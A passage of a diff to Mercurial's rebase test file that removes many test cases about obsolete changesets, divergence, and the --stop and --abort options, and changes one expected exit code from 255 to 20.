(rewritten using rebase as 10:7c6027df6a99) - |/ - o 0:cd010b8cd998 A - - $ hg debugobsolete - 5fddd98957c8a54a4d436dfe1da9d87f21a1b97b e273c5e7d2d29df783dce9f9eaa3ac4adc69c15d 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 32af7686d403cf45b5d95f2d70cebea587ac806a cf44d2f5a9f4297a62be94cbdd3dff7c7dc54258 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - 42ccdea3bb16d28e1848c95fe2e44c000f3f21b1 7c6027df6a99d93f461868e5433f63bde20b6dfb 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - -Test that rewriting leaving instability behind is allowed ---------------------------------------------------------------------- - - $ hg log -r 'children(8)' - 9:cf44d2f5a9f4 D (no-eol) - $ hg rebase -r 8 - rebasing 8:e273c5e7d2d2 "C" - 1 new orphan changesets - $ hg log -G - o 11:0d8f238b634c C - | - o 10:7c6027df6a99 B - | - | * 9:cf44d2f5a9f4 D - | | - | x 8:e273c5e7d2d2 C (rewritten using rebase as 11:0d8f238b634c) - | | - @ | 7:02de42196ebe H - | | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ cd .. - $ cp -R hidden stabilize - $ cd stabilize - $ hg rebase --auto-orphans '0::' -d 10 - abort: cannot specify both --auto-orphans and --dest - [10] - $ hg rebase --auto-orphans '0::' - rebasing 9:cf44d2f5a9f4 "D" - $ hg log -G - o 12:7e3935feaa68 D - | - o 11:0d8f238b634c C - | - o 10:7c6027df6a99 B - | - @ 7:02de42196ebe H - | - | o 6:eea13746799a G - |/| - o | 5:24b6387c8c8c F - | | - | o 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - - $ cd ../hidden - $ rm -r ../stabilize - -Test multiple root handling ------------------------------------- - - $ hg rebase --dest 4 --rev '7+11+9' - rebasing 9:cf44d2f5a9f4 "D" - rebasing 7:02de42196ebe "H" - rebasing 11:0d8f238b634c tip "C" - $ hg log -G - o 14:1e8370e38cca C - | - @ 13:bfe264faf697 H - | - | o 12:102b4c1d889b D - |/ - | * 10:7c6027df6a99 B - | | - | x 7:02de42196ebe H (rewritten using rebase as 13:bfe264faf697) - | | - +---o 6:eea13746799a G - | |/ - | o 5:24b6387c8c8c F - | | - o | 4:9520eea781bc E - |/ - o 0:cd010b8cd998 A - - $ cd .. - -Detach both parents - - $ hg init double-detach - $ cd double-detach - - $ hg debugdrawdag <<EOF - > F - > /| - > C E - > | | - > B D G - > \|/ - > A - > EOF - - $ hg rebase -d G -r 'B + D + F' - rebasing 1:112478962961 B "B" - rebasing 2:b18e25de2cf5 D "D" - rebasing 6:f15c3adaf214 F tip "F" - abort: cannot rebase 6:f15c3adaf214 without moving at least one of its parents - [255] - - $ cd .. - -test on rebase dropping a merge - -(setup) - - $ hg init dropmerge - $ cd dropmerge - $ hg unbundle "$TESTDIR/bundles/rebase.hg" - adding changesets - adding manifests - adding file changes - added 8 changesets with 7 changes to 7 files (+2 heads) - new changesets cd010b8cd998:02de42196ebe (8 drafts) - (run 'hg heads' to see heads, 'hg merge' to merge) - $ hg up 3 - 4 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg merge 7 - 2 files updated, 0 files merged, 0 files removed, 0 files unresolved - (branch merge, don't forget to commit) - $ hg ci -m 'M' - $ echo I > I - $ hg add I - $ hg ci -m I - $ hg log -G - @ 9:4bde274eefcf I - | - o 8:53a6a128b2b7 M - |\ - | o 7:02de42196ebe H - | | - | | o 6:eea13746799a G - | |/| - | o | 5:24b6387c8c8c F - | | | - | | o 4:9520eea781bc E - | |/ - o | 3:32af7686d403 D - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - -(actual test) - - $ hg rebase --dest 6 --rev '((desc(H) + desc(D))::) - desc(M)' - rebasing 3:32af7686d403 "D" - rebasing 7:02de42196ebe "H" - rebasing 9:4bde274eefcf tip "I" - 1 new orphan changesets - $ hg log -G - @ 12:acd174b7ab39 I - | - o 11:6c11a6218c97 H - | - | o 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - -Test hidden changesets in the rebase set (issue4504) - - $ hg up --hidden 9 - 3 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset 4bde274eefcf - (hidden revision '4bde274eefcf' was rewritten as: acd174b7ab39) - $ echo J > J - $ hg add J - $ hg commit -m J - 1 new orphan changesets - $ hg debugobsolete `hg log --rev . -T '{node}'` - 1 new obsolescence markers - obsoleted 1 changesets - - $ hg rebase --rev .~1::. --dest 'max(desc(D))' --traceback --config experimental.rebaseskipobsolete=off - rebasing 9:4bde274eefcf "I" - rebasing 13:06edfc82198f tip "J" - 2 new content-divergent changesets - $ hg log -G - @ 15:5ae8a643467b J - | - * 14:9ad579b4a5de I - | - | * 12:acd174b7ab39 I - | | - | o 11:6c11a6218c97 H - | | - o | 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg up 14 -C - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "K" > K - $ hg add K - $ hg commit --amend -m "K" - 1 new orphan changesets - $ echo "L" > L - $ hg add L - $ hg commit -m "L" - $ hg up '.^' - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "M" > M - $ hg add M - $ hg commit --amend -m "M" - 1 new orphan changesets - $ hg log -G - @ 18:bfaedf8eb73b M - | - | * 17:97219452e4bd L - | | - | x 16:fc37a630c901 K (rewritten using amend as 18:bfaedf8eb73b) - |/ - | * 15:5ae8a643467b J - | | - | x 14:9ad579b4a5de I (rewritten using amend as 16:fc37a630c901) - |/ - | * 12:acd174b7ab39 I - | | - | o 11:6c11a6218c97 H - | | - o | 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 14 -d 17 --config experimental.rebaseskipobsolete=True - note: not rebasing 14:9ad579b4a5de "I", already in destination as 16:fc37a630c901 "K" - rebasing 15:5ae8a643467b "J" - 1 new orphan changesets - - $ cd .. - Skip obsolete changeset even with multiple hops ----------------------------------------------- @@ -948,7 +222,7 @@ $ hg rebase -s 10 -d 12 abort: this rebase will cause divergences from: 121d9e3bc4c6 (to force the rebase please set experimental.evolution.allowdivergence=True) - [255] + [20] $ hg log -G @ 14:73568ab6879d bar foo | @@ -1044,1097 +318,24 @@ rebasing 21:7bdc8a87673d tip "dummy change" $ cd .. -Divergence cases due to obsolete changesets -------------------------------------------- - -We should ignore branches with unstable changesets when they are based on an -obsolete changeset which successor is in rebase set. - - $ hg init divergence - $ cd divergence - $ cat >> .hg/hgrc << EOF - > [extensions] - > strip = - > [alias] - > strip = strip --no-backup --quiet - > [templates] - > instabilities = '{rev}:{node|short} {desc|firstline}{if(instabilities," ({instabilities})")}\n' - > EOF - - $ hg debugdrawdag <<EOF - > e f - > | | - > d' d # replace: d -> d' - > \ / - > c - > | - > x b - > \| - > a - > EOF - 1 new orphan changesets - $ hg log -G -r 'a':: - * 7:1143e9adc121 f - | - | o 6:d60ebfa0f1cb e - | | - | o 5:027ad6c5830d d' - | | - x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - -Changeset d and its descendants are excluded to avoid divergence of d, which -would occur because the successor of d (d') is also in rebaseset. As a -consequence f (descendant of d) is left behind. - - $ hg rebase -b 'e' -d 'x' - rebasing 1:488e1b7e7341 b "b" - rebasing 3:a82ac2b38757 c "c" - rebasing 5:027ad6c5830d d' "d'" - rebasing 6:d60ebfa0f1cb e "e" - note: not rebasing 4:76be324c128b d "d" and its descendants as this would cause divergence - $ hg log -G -r 'a':: - o 11:eb6d63fc4ed5 e - | - o 10:44d8c724a70c d' - | - o 9:d008e6b4d3fd c - | - o 8:67e8f4a16c49 b - | - | * 7:1143e9adc121 f - | | - | | x 6:d60ebfa0f1cb e (rewritten using rebase as 11:eb6d63fc4ed5) - | | | - | | x 5:027ad6c5830d d' (rewritten using rebase as 10:44d8c724a70c) - | | | - | x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - | |/ - | x 3:a82ac2b38757 c (rewritten using rebase as 9:d008e6b4d3fd) - | | - o | 2:630d7c95eff7 x - | | - | x 1:488e1b7e7341 b (rewritten using rebase as 8:67e8f4a16c49) - |/ - o 0:b173517d0057 a - - $ hg strip -r 8: - $ hg log -G -r 'a':: - * 7:1143e9adc121 f - | - | o 6:d60ebfa0f1cb e - | | - | o 5:027ad6c5830d d' - | | - x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - -If the rebase set has an obsolete (d) with a successor (d') outside the rebase -set and none in destination, we still get the divergence warning. -By allowing divergence, we can perform the rebase. - - $ hg rebase -r 'c'::'f' -d 'x' - abort: this rebase will cause divergences from: 76be324c128b - (to force the rebase please set experimental.evolution.allowdivergence=True) - [255] - $ hg rebase --config experimental.evolution.allowdivergence=true -r 'c'::'f' -d 'x' - rebasing 3:a82ac2b38757 c "c" - rebasing 4:76be324c128b d "d" - rebasing 7:1143e9adc121 f tip "f" - 1 new orphan changesets - 2 new content-divergent changesets - $ hg log -G -r 'a':: -T instabilities - o 10:e1744ea07510 f - | - * 9:e2b36ea9a0a0 d (content-divergent) - | - o 8:6a0376de376e c - | - | x 7:1143e9adc121 f - | | - | | * 6:d60ebfa0f1cb e (orphan) - | | | - | | * 5:027ad6c5830d d' (orphan content-divergent) - | | | - | x | 4:76be324c128b d - | |/ - | x 3:a82ac2b38757 c - | | - o | 2:630d7c95eff7 x - | | - | o 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - $ hg strip -r 8: - -(Not skipping obsoletes means that divergence is allowed.) - - $ hg rebase --config experimental.rebaseskipobsolete=false -r 'c'::'f' -d 'x' - rebasing 3:a82ac2b38757 c "c" - rebasing 4:76be324c128b d "d" - rebasing 7:1143e9adc121 f tip "f" - 1 new orphan changesets - 2 new content-divergent changesets - - $ hg strip -r 0: - -Similar test on a more complex graph - - $ hg debugdrawdag <<EOF - > g - > | - > f e - > | | - > e' d # replace: e -> e' - > \ / - > c - > | - > x b - > \| - > a - > EOF - 1 new orphan changesets - $ hg log -G -r 'a': - * 8:2876ce66c6eb g - | - | o 7:3ffec603ab53 f - | | - x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea) - | | - | o 5:63324dc512ea e' - | | - o | 4:76be324c128b d - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - $ hg rebase -b 'f' -d 'x' - rebasing 1:488e1b7e7341 b "b" - rebasing 3:a82ac2b38757 c "c" - rebasing 5:63324dc512ea e' "e'" - rebasing 7:3ffec603ab53 f "f" - rebasing 4:76be324c128b d "d" - note: not rebasing 6:e36fae928aec e "e" and its descendants as this would cause divergence - $ hg log -G -r 'a': - o 13:a1707a5b7c2c d - | - | o 12:ef6251596616 f - | | - | o 11:b6f172e64af9 e' - |/ - o 10:d008e6b4d3fd c - | - o 9:67e8f4a16c49 b - | - | * 8:2876ce66c6eb g - | | - | | x 7:3ffec603ab53 f (rewritten using rebase as 12:ef6251596616) - | | | - | x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea) - | | | - | | x 5:63324dc512ea e' (rewritten using rebase as 11:b6f172e64af9) - | | | - | x | 4:76be324c128b d (rewritten using rebase as 13:a1707a5b7c2c) - | |/ - | x 3:a82ac2b38757 c (rewritten using rebase as 10:d008e6b4d3fd) - | | - o | 2:630d7c95eff7 x - | | - | x 1:488e1b7e7341 b (rewritten using rebase as 9:67e8f4a16c49) - |/ - o 0:b173517d0057 a - - -issue5782 - $ hg strip -r 0: - $ hg debugdrawdag <<EOF - > d - > | - > c1 c # replace: c -> c1 - > \ / - > b - > | - > a - > EOF - 1 new orphan changesets - $ hg debugobsolete `hg log -T "{node}" --hidden -r 'desc("c1")'` - 1 new obsolescence markers - obsoleted 1 changesets - $ hg log -G -r 'a': --hidden - * 4:76be324c128b d - | - | x 3:ef8a456de8fa c1 (pruned) - | | - x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa) - |/ - o 1:488e1b7e7341 b - | - o 0:b173517d0057 a - - $ hg rebase -d 0 -r 2 - rebasing 2:a82ac2b38757 c "c" - $ hg log -G -r 'a': --hidden - o 5:69ad416a4a26 c - | - | * 4:76be324c128b d - | | - | | x 3:ef8a456de8fa c1 (pruned) - | | | - | x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa rewritten using rebase as 5:69ad416a4a26) - | |/ - | o 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - $ cd .. - -Rebase merge where successor of one parent is equal to destination (issue5198) - - $ hg init p1-succ-is-dest - $ cd p1-succ-is-dest - - $ hg debugdrawdag <<EOF - > F - > /| - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d B -s D - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 4:66f1a38021c9 F tip "F" - $ hg log -G - o 5:50e9d60b99c6 F - |\ - | | x 4:66f1a38021c9 F (rewritten using rebase as 5:50e9d60b99c6) - | |/| - | o | 3:7fb047a69f22 E - | | | - | | x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | |/ - o | 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is equal to destination - - $ hg init p2-succ-is-dest - $ cd p2-succ-is-dest - - $ hg debugdrawdag <<EOF - > F - > /| - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d B -s E - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 4:66f1a38021c9 F tip "F" - $ hg log -G - o 5:aae1787dacee F - |\ - | | x 4:66f1a38021c9 F (rewritten using rebase as 5:aae1787dacee) - | |/| - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - | o | 2:b18e25de2cf5 D - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of one parent is ancestor of destination - - $ hg init p1-succ-in-dest - $ cd p1-succ-in-dest - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -s D - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" +Can rebase pruned and rewritten commits with --keep - $ hg log -G - o 6:0913febf6439 F - |\ - +---x 5:66f1a38021c9 F (rewritten using rebase as 6:0913febf6439) - | | | - | o | 4:26805aba1e60 C - | | | - o | | 3:7fb047a69f22 E - | | | - +---x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | | - | o 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is ancestor of destination - - $ hg init p2-succ-in-dest - $ cd p2-succ-in-dest - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -s E - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - $ hg log -G - o 6:c6ab0cc6d220 F - |\ - +---x 5:66f1a38021c9 F (rewritten using rebase as 6:c6ab0cc6d220) - | | | - | o | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - o---+ 2:b18e25de2cf5 D - / / - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of one parent is ancestor of destination - - $ hg init p1-succ-in-dest-b - $ cd p1-succ-in-dest-b - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -b F - rebasing 2:b18e25de2cf5 D "D" - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - note: not rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes - $ hg log -G - o 6:8f47515dda15 D - | - | x 5:66f1a38021c9 F (pruned using rebase) - | |\ - o | | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - | x | 2:b18e25de2cf5 D (rewritten using rebase as 6:8f47515dda15) - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is ancestor of destination - - $ hg init p2-succ-in-dest-b - $ cd p2-succ-in-dest-b - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: D -> B - > \|/ + $ hg init keep + $ cd keep + $ hg debugdrawdag <<'EOS' + > D + > | + > C + > | + > F B E # prune: B + > \|/ # rebase: C -> E > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -b F - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 3:7fb047a69f22 E "E" - rebasing 5:66f1a38021c9 F tip "F" - note: not rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes - - $ hg log -G - o 6:533690786a86 E - | - | x 5:66f1a38021c9 F (pruned using rebase) - | |\ - o | | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using rebase as 6:533690786a86) - | | | - | x | 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where extinct node has successor that is not an ancestor of -destination - - $ hg init extinct-with-succ-not-in-dest - $ cd extinct-with-succ-not-in-dest - - $ hg debugdrawdag <<EOF - > E C # replace: C -> E - > | | - > D B - > |/ - > A - > EOF - - $ hg rebase -d D -s B - rebasing 1:112478962961 B "B" - note: not rebasing 3:26805aba1e60 C "C" and its descendants as this would cause divergence - - $ cd .. - - $ hg init p2-succ-in-dest-c - $ cd p2-succ-in-dest-c - -The scenario here was that B::D were developed on default. B was queued on -stable, but amended before being push to hg-committed. C was queued on default, -along with unrelated J. - - $ hg debugdrawdag <<EOF - > J - > | - > F - > | - > E - > | D - > | | - > | C # replace: C -> F - > | | H I # replace: B -> H -> I - > | B |/ - > |/ G - > A - > EOF - 1 new orphan changesets - -This strip seems to be the key to avoid an early divergence warning. - $ hg --config extensions.strip= --hidden strip -qr H - 1 new orphan changesets - - $ hg rebase -b 'desc("D")' -d 'desc("J")' - abort: this rebase will cause divergences from: 112478962961 - (to force the rebase please set experimental.evolution.allowdivergence=True) - [255] - -Rebase merge where both parents have successors in destination - - $ hg init p12-succ-in-dest - $ cd p12-succ-in-dest - $ hg debugdrawdag <<'EOS' - > E F - > /| /| # replace: A -> C - > A B C D # replace: B -> D - > | | - > X Y - > EOS - 1 new orphan changesets - $ hg rebase -r A+B+E -d F - note: not rebasing 4:a3d17304151f A "A", already in destination as 0:96cc3511f894 C "C" - note: not rebasing 5:b23a2cc00842 B "B", already in destination as 1:058c1e1fb10a D "D" - rebasing 7:dac5d11c5a7d E tip "E" - abort: rebasing 7:dac5d11c5a7d will include unwanted changes from 3:59c792af609c, 5:b23a2cc00842 or 2:ba2b7fa7166d, 4:a3d17304151f - [255] - $ cd .. - -Rebase a non-clean merge. One parent has successor in destination, the other -parent moves as requested. - - $ hg init p1-succ-p2-move - $ cd p1-succ-p2-move - $ hg debugdrawdag <<'EOS' - > D Z - > /| | # replace: A -> C - > A B C # D/D = D - > EOS - 1 new orphan changesets - $ hg rebase -r A+B+D -d Z - note: not rebasing 0:426bada5c675 A "A", already in destination as 2:96cc3511f894 C "C" - rebasing 1:fc2b737bb2e5 B "B" - rebasing 3:b8ed089c80ad D "D" - - $ rm .hg/localtags - $ hg log -G - o 6:e4f78693cc88 D - | - o 5:76840d832e98 B - | - o 4:50e41c1f3950 Z - | - o 2:96cc3511f894 C - - $ hg files -r tip - B - C - D - Z - - $ cd .. - - $ hg init p1-move-p2-succ - $ cd p1-move-p2-succ - $ hg debugdrawdag <<'EOS' - > D Z - > /| | # replace: B -> C - > A B C # D/D = D - > EOS - 1 new orphan changesets - $ hg rebase -r B+A+D -d Z - rebasing 0:426bada5c675 A "A" - note: not rebasing 1:fc2b737bb2e5 B "B", already in destination as 2:96cc3511f894 C "C" - rebasing 3:b8ed089c80ad D "D" - - $ rm .hg/localtags - $ hg log -G - o 6:1b355ed94d82 D - | - o 5:a81a74d764a6 A - | - o 4:50e41c1f3950 Z - | - o 2:96cc3511f894 C - - $ hg files -r tip - A - C - D - Z - - $ cd .. - -Test that bookmark is moved and working dir is updated when all changesets have -equivalents in destination - $ hg init rbsrepo && cd rbsrepo - $ echo "[experimental]" > .hg/hgrc - $ echo "evolution=true" >> .hg/hgrc - $ echo "rebaseskipobsolete=on" >> .hg/hgrc - $ echo root > root && hg ci -Am root - adding root - $ echo a > a && hg ci -Am a - adding a - $ hg up 0 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo b > b && hg ci -Am b - adding b - created new head - $ hg rebase -r 2 -d 1 - rebasing 2:1e9a3c00cbe9 tip "b" - $ hg log -r . # working dir is at rev 3 (successor of 2) - 3:be1832deae9a b (no-eol) - $ hg book -r 2 mybook --hidden # rev 2 has a bookmark on it now - bookmarking hidden changeset 1e9a3c00cbe9 - (hidden revision '1e9a3c00cbe9' was rewritten as: be1832deae9a) - $ hg up 2 && hg log -r . # working dir is at rev 2 again - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - 2:1e9a3c00cbe9 b (rewritten using rebase as 3:be1832deae9a) (no-eol) - $ hg rebase -r 2 -d 3 --config experimental.evolution.track-operation=1 - note: not rebasing 2:1e9a3c00cbe9 mybook "b", already in destination as 3:be1832deae9a tip "b" -Check that working directory and bookmark was updated to rev 3 although rev 2 -was skipped - $ hg log -r . - 3:be1832deae9a b (no-eol) - $ hg bookmarks - mybook 3:be1832deae9a - $ hg debugobsolete --rev tip - 1e9a3c00cbe90d236ac05ef61efcc5e40b7412bc be1832deae9ac531caa7438b8dcf6055a122cd8e 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - -Obsoleted working parent and bookmark could be moved if an ancestor of working -parent gets moved: - - $ hg init $TESTTMP/ancestor-wd-move - $ cd $TESTTMP/ancestor-wd-move - $ hg debugdrawdag <<'EOS' - > E D1 # rebase: D1 -> D2 - > | | - > | C - > D2 | - > | B - > |/ - > A - > EOS - $ hg update D1 -q - $ hg bookmark book -i - $ hg rebase -r B+D1 -d E - rebasing 1:112478962961 B "B" - note: not rebasing 5:15ecf15e0114 book D1 tip "D1", already in destination as 2:0807738e0be9 D2 "D2" - 1 new orphan changesets - $ hg log -G -T '{desc} {bookmarks}' - @ B book - | - | x D1 - | | - o | E - | | - | * C - | | - o | D2 - | | - | x B - |/ - o A - -Rebasing a merge with one of its parent having a hidden successor - - $ hg init $TESTTMP/merge-p1-hidden-successor - $ cd $TESTTMP/merge-p1-hidden-successor - - $ hg debugdrawdag <<'EOS' - > E - > | - > B3 B2 # amend: B1 -> B2 -> B3 - > |/ # B2 is hidden - > | D - > | |\ - > | B1 C - > |/ - > A > EOS 1 new orphan changesets - $ eval `hg tags -T '{tag}={node}\n'` - $ rm .hg/localtags - - $ hg rebase -r $D -d $E - rebasing 5:9e62094e4d94 "D" - - $ hg log -G - o 7:a699d059adcf D - |\ - | o 6:ecc93090a95c E - | | - | o 4:0dc878468a23 B3 - | | - o | 1:96cc3511f894 C - / - o 0:426bada5c675 A - -For some reasons (--hidden, rebaseskipobsolete=0, directaccess, etc.), -rebasestate may contain hidden hashes. "rebase --abort" should work regardless. - - $ hg init $TESTTMP/hidden-state1 - $ cd $TESTTMP/hidden-state1 - $ cat >> .hg/hgrc <<EOF - > [experimental] - > rebaseskipobsolete=0 - > EOF - - $ hg debugdrawdag <<'EOS' - > C - > | - > D B # prune: B, C - > |/ # B/D=B - > A - > EOS - - $ eval `hg tags -T '{tag}={node}\n'` - $ rm .hg/localtags - - $ hg update -q $C --hidden - updated to hidden changeset 7829726be4dc - (hidden revision '7829726be4dc' is pruned) - $ hg rebase -s $B -d $D - rebasing 1:2ec65233581b "B" - merging D - warning: conflicts while merging D! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - - $ cp -R . $TESTTMP/hidden-state2 - - $ hg log -G - @ 2:b18e25de2cf5 D - | - | % 1:2ec65233581b B (pruned using prune) - |/ - o 0:426bada5c675 A - - $ hg summary - parent: 2:b18e25de2cf5 tip - D - branch: default - commit: 1 modified, 1 added, 1 unknown, 1 unresolved - update: 1 new changesets, 2 branch heads (merge) - phases: 3 draft - rebase: 0 rebased, 2 remaining (rebase --continue) - - $ hg rebase --abort - rebase aborted - -Also test --continue for the above case - - $ cd $TESTTMP/hidden-state2 - $ hg resolve -m - (no more unresolved files) - continue: hg rebase --continue - $ hg rebase --continue - rebasing 1:2ec65233581b "B" - rebasing 3:7829726be4dc tip "C" - $ hg log -G - @ 5:1964d5d5b547 C - | - o 4:68deb90c12a2 B - | - o 2:b18e25de2cf5 D - | - o 0:426bada5c675 A - -==================== -Test --stop option | -==================== - $ cd .. - $ hg init rbstop - $ cd rbstop - $ echo a>a - $ hg ci -Aqma - $ echo b>b - $ hg ci -Aqmb - $ echo c>c - $ hg ci -Aqmc - $ echo d>d - $ hg ci -Aqmd - $ hg up 0 -q - $ echo f>f - $ hg ci -Aqmf - $ echo D>d - $ hg ci -Aqm "conflict with d" - $ hg up 3 -q - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - 1 new orphan changesets - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 7:7fffad344617 test - | c - | - o 6:b15528633407 test - | b - | - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | x 2:177f92b77385 test - | | c - | | - | x 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test it aborts if unstable csets is not allowed: -=============================================== - $ cat >> $HGRCPATH << EOF - > [experimental] - > evolution.allowunstable=False - > EOF + $ hg rebase -b D -d F --keep + rebasing 1:112478962961 B "B" + rebasing 4:26805aba1e60 C "C" + rebasing 5:f585351a92f8 D tip "D" - $ hg strip 6 --no-backup -q - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - abort: cannot remove original changesets with unrebased descendants - (either enable obsmarkers to allow unstable revisions or use --keep to keep original changesets) - [255] - $ hg rebase --abort - saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg - rebase aborted - -Test --stop when --keep is passed: -================================== - $ hg rebase -s 1 -d 5 --keep - rebasing 1:d2ae7f538514 "b" - 